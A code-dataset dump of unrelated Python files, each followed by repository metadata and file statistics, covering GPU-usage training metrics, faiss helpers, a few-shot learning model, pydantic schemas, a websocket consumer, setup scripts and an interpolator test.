"""
Creates an instance of the Minibatch Max GPU metric
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_training(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_training_iteration(self, strategy: 'BaseStrategy') -> None:
self.reset()
def after_training_iteration(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_training(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_MB"
class EpochMaxGPU(PluginMetric[float]):
"""
The Epoch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the epoch Max GPU metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_training(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_training_epoch(self, strategy) -> MetricResult:
self.reset()
def after_training_epoch(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_training(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Epoch"
class ExperienceMaxGPU(PluginMetric[float]):
"""
The Experience Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Experience CPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_eval(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_eval_exp(self, strategy) -> MetricResult:
self.reset()
def after_eval_exp(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_eval(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy, add_experience=True)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Experience"
class StreamMaxGPU(PluginMetric[float]):
"""
The Stream Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Experience CPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_eval(self, strategy) -> MetricResult:
self.reset()
self._gpu.start_thread()
def after_eval(self, strategy: 'BaseStrategy') \
-> MetricResult:
packed = self._package_result(strategy)
self._gpu.stop_thread()
return packed
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
phase_name, _ = phase_and_task(strategy)
stream = stream_type(strategy.experience)
metric_name = '{}/{}_phase/{}_stream' \
.format(str(self),
phase_name,
stream)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Stream"
def gpu_usage_metrics(gpu_id, every=0.5, minibatch=False, epoch=False,
experience=False, stream=False) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
:param minibatch: If True, will return a metric able to log the minibatch
max GPU usage.
:param epoch: If True, will return a metric able to log the epoch
max GPU usage.
:param experience: If True, will return a metric able to log the experience
max GPU usage.
:param stream: If True, will return a metric able to log the evaluation
max stream GPU usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchMaxGPU(gpu_id, every))
if epoch:
metrics.append(EpochMaxGPU(gpu_id, every))
if experience:
metrics.append(ExperienceMaxGPU(gpu_id, every))
if stream:
metrics.append(StreamMaxGPU(gpu_id, every))
return metrics
__all__ = [
'MaxGPU',
'MinibatchMaxGPU',
'EpochMaxGPU',
'ExperienceMaxGPU',
'StreamMaxGPU',
'gpu_usage_metrics'
]
| 29.717678 | 80 | 0.589097 | 1,310 | 11,263 | 4.868702 | 0.166412 | 0.03371 | 0.026811 | 0.018344 | 0.520853 | 0.492945 | 0.4873 | 0.473816 | 0.473816 | 0.473816 | 0 | 0.004622 | 0.308444 | 11,263 | 378 | 81 | 29.796296 | 0.814225 | 0.27435 | 0 | 0.502762 | 0 | 0 | 0.078166 | 0.019713 | 0 | 0 | 0 | 0 | 0.005525 | 1 | 0.226519 | false | 0 | 0.049724 | 0.060773 | 0.403315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f93e22cf26c9a478c3691514ddab933b92e050e | 280 | py | Python | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | import numpy as np
import pickle
expert_file = 'maze_expert.npy'
imitation_agent_file = 'maze_agent.npy'
with open(imitation_agent_file, 'rb') as handle:
agent_data = pickle.load(handle)
with open(expert_file, 'rb') as handle:
expert_data = pickle.load(handle)
print("OK") | 31.111111 | 48 | 0.757143 | 44 | 280 | 4.590909 | 0.431818 | 0.09901 | 0.178218 | 0.138614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 280 | 9 | 49 | 31.111111 | 0.827869 | 0 | 0 | 0 | 0 | 0 | 0.124555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f9d6fb07fd37fbb906d2b22ed6f41821f271822 | 198 | py | Python | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | #To run the code, write
#from ishashad import ishashad
#then ishashad(number)
def ishashad(n):
if n % sum(map(int,str(n))) == 0:
print("True")
else:
print("False")
return | 18 | 37 | 0.60101 | 29 | 198 | 4.103448 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006757 | 0.252525 | 198 | 11 | 38 | 18 | 0.797297 | 0.363636 | 0 | 0 | 0 | 0 | 0.072581 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa203b91e4061ab9a5aeb13af78a9c24d505f2c | 785 | py | Python | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 22 | 2019-01-13T12:56:56.000Z | 2020-11-03T01:39:20.000Z | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | null | null | null | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 5 | 2019-04-01T09:19:55.000Z | 2020-05-26T14:38:06.000Z | # -*- coding: utf-8 -*-
"""
File Name: faiss_utils
Description : faiss工具类
Author : mick.yi
date: 2019/1/4
"""
import faiss
import numpy as np
def get_index(dimension):
sub_index = faiss.IndexFlatL2(dimension)
index = faiss.IndexIDMap(sub_index)
return index
def update_multi(index, vectors, ids):
"""
:param index:
:param vectors:
:param ids:
:return:
备注:ValueError: array is not C-contiguous
"""
idx = np.argsort(ids)
# 先删除再添加
index.remove_ids(ids[idx])
index.add_with_ids(vectors[idx], ids[idx])
def update_one(index, vector, label_id):
vectors = np.expand_dims(vector, axis=0)
ids = np.array([label_id])
update_multi(index, vectors, ids)
| 21.216216 | 47 | 0.602548 | 100 | 785 | 4.6 | 0.54 | 0.034783 | 0.069565 | 0.1 | 0.113043 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.277707 | 785 | 36 | 48 | 21.805556 | 0.795414 | 0.280255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa21afd208bf7323dcf7c8f05508069120736b0 | 475 | py | Python | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 1 | 2021-05-29T23:43:36.000Z | 2021-05-29T23:43:36.000Z | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | null | null | null | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 2 | 2021-06-01T01:36:01.000Z | 2021-06-01T01:36:59.000Z | class Relogio:
def __init__(self):
self.horas = 6
self.minutos = 0
self.dia = 1
def __str__(self):
return f"{self.horas:02d}:{self.minutos:02d} do dia {self.dia:02d}"
def avancaTempo(self, minutos):
self.minutos += minutos
while(self.minutos >= 60):
self.minutos -= 60
self.horas += 1
if self.horas >= 24:
self.horas = 0
self.dia +=1
| 23.75 | 75 | 0.492632 | 57 | 475 | 3.964912 | 0.368421 | 0.292035 | 0.070796 | 0.079646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062069 | 0.389474 | 475 | 19 | 76 | 25 | 0.717241 | 0 | 0 | 0 | 0 | 0.066667 | 0.120507 | 0.073996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.066667 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa4cb77b9686bd974f4ba0799278420d18f452c | 1,928 | py | Python | fewshot/models/basic_model_VAT_ENT.py | AhmedAyad89/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 22 | 2019-03-13T02:19:17.000Z | 2021-08-06T03:13:00.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 1 | 2019-07-27T14:33:02.000Z | 2020-06-01T11:03:20.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 5 | 2019-03-07T06:18:51.000Z | 2019-10-22T05:33:23.000Z | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
import tensorflow as tf
from fewshot.models.kmeans_utils import compute_logits
from fewshot.models.model import Model
from fewshot.models.refine_model import RefineModel
from fewshot.models.basic_model_VAT import BasicModelVAT
from fewshot.models.model_factory import RegisterModel
from fewshot.models.nnlib import (concat, weight_variable)
from fewshot.utils import logger
from fewshot.utils.debug import debug_identity
from fewshot.models.SSL_utils import *
l2_norm = lambda t: tf.sqrt(tf.reduce_sum(tf.pow(t, 2)))
log = logger.get()
@RegisterModel("basic-VAT-ENT")
class BasicModelVAT_ENT(BasicModelVAT):
def get_train_op(self, logits, y_test):
loss, train_op = BasicModelVAT.get_train_op(self, logits, y_test)
config = self.config
ENT_weight = config.ENT_weight
VAT_ENT_step_size = config.VAT_ENT_step_size
logits = self._unlabel_logits
s = tf.shape(logits)
s = s[0]
p = tf.stop_gradient(self.h_unlabel)
affinity_matrix = compute_logits(p, p) - (tf.eye(s, dtype=tf.float32) * 1000.0)
# logits = tf.Print(logits, [tf.shape(point_logits)])
ENT_loss = walking_penalty(logits, affinity_matrix)
loss += ENT_weight * ENT_loss
ENT_opt = tf.train.AdamOptimizer(VAT_ENT_step_size * self.learn_rate, name="Entropy-optimizer")
ENT_grads_and_vars = ENT_opt.compute_gradients(loss)
train_op = ENT_opt.apply_gradients(ENT_grads_and_vars)
for gradient, variable in ENT_grads_and_vars:
if gradient is None:
gradient = tf.constant(0.0)
self.adv_summaries.append(tf.summary.scalar("ENT/gradients/" + variable.name, l2_norm(gradient), family="Grads"))
self.adv_summaries.append(tf.summary.histogram("ENT/gradients/" + variable.name, gradient, family="Grads"))
self.summaries.append(tf.summary.scalar('entropy loss', ENT_loss))
return loss, train_op
| 33.824561 | 116 | 0.769191 | 287 | 1,928 | 4.923345 | 0.355401 | 0.070064 | 0.084218 | 0.029724 | 0.104742 | 0.079264 | 0.035386 | 0 | 0 | 0 | 0 | 0.007738 | 0.128631 | 1,928 | 56 | 117 | 34.428571 | 0.833333 | 0.026452 | 0 | 0 | 0 | 0 | 0.042712 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.307692 | 0 | 0.384615 | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6fa85d4b0b5bfa6ac386b4e088bb46a5cbd9b94a | 614 | py | Python | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | #coding: utf-8
from aip import AipSpeech
from config import DefaultConfig as opt
class composer():
def __init__(self):
pass
def compose(self,text ='你好'):
#百度后台获取的秘�?
APP_ID = opt.baidu_app_id
API_KEY = opt.baidu_api_key
SECRET_KEY =opt.baidu_secret_key
client = AipSpeech(APP_ID, API_KEY, SECRET_KEY)
result = client.synthesis(text,'zh',1,{
'vol':5,})
file_name = 'ans.mp3'
if not isinstance(result, dict):
with open(file_name, 'wb') as f:
f.write(result)
return file_name
| 26.695652 | 55 | 0.583062 | 82 | 614 | 4.146341 | 0.597561 | 0.044118 | 0.047059 | 0.064706 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001629 | 0.009524 | 0.315961 | 614 | 22 | 56 | 27.909091 | 0.797619 | 0.039088 | 0 | 0 | 0 | 0 | 0.027257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.058824 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6fb000a6fd5b519a73bbb7413dd210206c96960d | 370 | py | Python | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | # https://www.geeksforgeeks.org/write-a-program-to-reverse-an-array-or-string/
# Time: O(n)
# Space: 1
def reverseByMiddles(arr):
n = len(arr)
limit = n//2
for i in range(limit):
temp = arr[i]
arr[i] = arr[(n-1)-i]
arr[(n-1)-i] = temp
return arr
arr = [1,2,3]
result = reverseByMiddles(arr)
print(result)
print(reverseByMiddles(arr = [1,2,3,4]))
| 18.5 | 78 | 0.627027 | 64 | 370 | 3.625 | 0.53125 | 0.24569 | 0.060345 | 0.051724 | 0.056034 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036066 | 0.175676 | 370 | 19 | 79 | 19.473684 | 0.72459 | 0.259459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fbe42378fbc286f445856d3f64bebf5d1265f7a | 1,173 | py | Python | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 43 | 2020-12-14T18:19:15.000Z | 2022-03-30T05:57:43.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 3 | 2021-02-19T09:56:35.000Z | 2022-03-30T13:26:50.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 16 | 2020-12-14T02:49:35.000Z | 2022-02-15T10:39:39.000Z | from pydantic import BaseModel, Field, EmailStr
class PostSchema(BaseModel):
id: int = Field(default=None)
title: str = Field(...)
content: str = Field(...)
class Config:
schema_extra = {
"example": {
"title": "Securing FastAPI applications with JWT.",
"content": "In this tutorial, you'll learn how to secure your application by enabling authentication using JWT. We'll be using PyJWT to sign, encode and decode JWT tokens...."
}
}
class UserSchema(BaseModel):
fullname: str = Field(...)
email: EmailStr = Field(...)
password: str = Field(...)
class Config:
schema_extra = {
"example": {
"fullname": "Abdulazeez Abdulazeez Adeshina",
"email": "abdulazeez@x.com",
"password": "weakpassword"
}
}
class UserLoginSchema(BaseModel):
email: EmailStr = Field(...)
password: str = Field(...)
class Config:
schema_extra = {
"example": {
"email": "abdulazeez@x.com",
"password": "weakpassword"
}
}
| 27.27907 | 191 | 0.535379 | 107 | 1,173 | 5.841122 | 0.53271 | 0.064 | 0.0624 | 0.0912 | 0.3856 | 0.3856 | 0.2608 | 0.2016 | 0.2016 | 0.2016 | 0 | 0 | 0.341006 | 1,173 | 42 | 192 | 27.928571 | 0.808538 | 0 | 0 | 0.5 | 0 | 0.029412 | 0.30179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.117647 | 0.029412 | 0 | 0.441176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6fc63d77d8ed73c401918b676d06084cc00b6c87 | 954 | py | Python | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | 1 | 2022-02-07T15:56:24.000Z | 2022-02-07T15:56:24.000Z | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | 1 | 2022-02-18T01:23:46.000Z | 2022-02-18T01:23:46.000Z | ## Copyright © 2021, Oracle and/or its affiliates.
## Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
#!/usr/bin/env python
from setuptools import setup
setup(name='wind-marketplace-library',
version="1.0.0",
description='Robot Framework test library for OCI Marketplace',
long_description='Robot Framework test library for OCI Marketplace',
classifiers=[
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Framework :: WIND Robot Framework',
],
author='arun.poonia@oracle.com',
author_email='arun.poonia@oracle.com',
packages=['MarketplaceLibrary'],
license = "UPL-1.0",
install_requires=[
],
extras_require={
'dev': [
]
},
platforms='any',
include_package_data=True,
zip_safe=False) | 31.8 | 105 | 0.634172 | 108 | 954 | 5.546296 | 0.685185 | 0.010017 | 0.083472 | 0.096828 | 0.176962 | 0.176962 | 0.176962 | 0.176962 | 0 | 0 | 0 | 0.018006 | 0.243187 | 954 | 30 | 106 | 31.8 | 0.810249 | 0.179245 | 0 | 0.083333 | 0 | 0 | 0.429306 | 0.087404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.041667 | 0 | 0.041667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdb320f11ce21ba2207772e25516617a4f09f64 | 310 | py | Python | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 12 | 2015-07-28T15:31:51.000Z | 2019-03-03T23:39:10.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 4 | 2017-01-25T05:24:17.000Z | 2019-04-03T00:25:13.000Z | setup.py | Juniper/contrail-server-manager | 61a586495b4819904887b5dccb9288b9cf3d2ad5 | [
"Apache-2.0"
] | 33 | 2015-01-07T10:01:28.000Z | 2020-07-26T08:22:53.000Z | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
from setuptools import setup
import setuptools
setup(
name='contrail-server-manager',
version='0.1dev',
packages=setuptools.find_packages(exclude=["*.pyc"]),
zip_safe=False,
long_description="Server Manager package",
)
| 20.666667 | 64 | 0.716129 | 37 | 310 | 5.918919 | 0.810811 | 0.118721 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022989 | 0.158065 | 310 | 14 | 65 | 22.142857 | 0.816092 | 0.2 | 0 | 0 | 0 | 0 | 0.229508 | 0.094262 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.222222 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fdd8bc73e2b49aa962aeebacd2ae774e4162d17 | 1,013 | py | Python | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | 12 | 2020-02-12T01:14:42.000Z | 2022-03-11T23:54:43.000Z | segmentfault/apps/msg/consumer.py | Yookyiss/segmentfault | 8fb7890c8b650ac34541a8fb14c3cd9bef98d120 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# @Time : 2019/7/21 12:35 PM
# @Author : __wutonghe__
# docs https://channels.readthedocs.io/en/latest/tutorial/part_3.html#rewrite-the-consumer-to-be-asynchronous
from channels.generic.websocket import AsyncWebsocketConsumer
import json
class MessageConsumer(AsyncWebsocketConsumer):
"""
私信websocket,采用异步通信来增加并发
"""
async def connect(self):
"""当 websocket 一链接上以后触发该函数"""
if self.scope['user'].is_anonymous:
await self.close()
else:
await self.channel_layer.group_add(self.scope['user'].username + '-message',self.channel_name) # 创建聊天室
await self.accept()
async def receive(self, text_data=None, bytes_data=None):
"""将答复交回给websocket"""
await self.send(text_data=json.dumps(text_data)) # 将消息发送给前端
async def disconnect(self, code):
"""断开链接时触发该函数"""
await self.channel_layer.group_discard(self.scope['user'].username + '-message',self.channel_name) # 将该链接移出聊天室
| 30.69697 | 119 | 0.669299 | 119 | 1,013 | 5.563025 | 0.638655 | 0.067976 | 0.058912 | 0.063444 | 0.208459 | 0.129909 | 0.129909 | 0.129909 | 0 | 0 | 0 | 0.01599 | 0.197433 | 1,013 | 32 | 120 | 31.65625 | 0.798278 | 0.228036 | 0 | 0 | 0 | 0 | 0.040404 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe090a4e22c0963ebcb0f7db477cda0fa848e0e | 2,618 | py | Python | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | tests/utils/test_interpolator.py | JelleAalbers/hypney | 3e38e21743fc9babe0ed47af299d08242a9b6d32 | [
"MIT"
] | null | null | null | import eagerpy as ep
import numpy as np
from scipy.interpolate import RegularGridInterpolator
import hypney
tl = ep.numpy
def test_regular_grid_interpolator():
"""Adapted from
https://github.com/sbarratt/torch_interpolations/blob/master/tests/test_grid_interpolator.py
"""
points = [tl.arange(-0.5, 2.5, 0.1) * 1.0, tl.arange(-0.5, 2.5, 0.2) * 1.0]
values = (
hypney.utils.eagerpy.sin(points[0])[:, None]
+ 2 * hypney.utils.eagerpy.cos(points[1])[None, :]
+ hypney.utils.eagerpy.sin(5 * points[0][:, None] @ points[1][None, :])
)
X, Y = ep.meshgrid(tl.arange(-0.5, 2, 0.1), tl.arange(-0.5, 2, 0.1))
points_to_interp = ep.stack([X.flatten(), Y.flatten()]).T
gi = hypney.utils.interpolation.RegularGridInterpolator(points, values)
fx = gi(points_to_interp)
rgi = RegularGridInterpolator(
[p.numpy() for p in points], [x.numpy() for x in values], bounds_error=False
)
rfx = rgi(points_to_interp.numpy())
np.testing.assert_allclose(rfx, fx.numpy(), atol=1e-6)
# TODO: port derivative test to eagerpy
# note that points_to_interp has to be transposed
#
# def test_regular_grid_interpolator_derivative():
# points = [torch.arange(-.5, 2.5, .5) * 1., torch.arange(-.5, 2.5, .5) * 1.]
# values = torch.sin(points[0])[:, None] + 2 * torch.cos(points[1])[None, :] + torch.sin(5 * points[0][:, None] @ points[1][None, :])
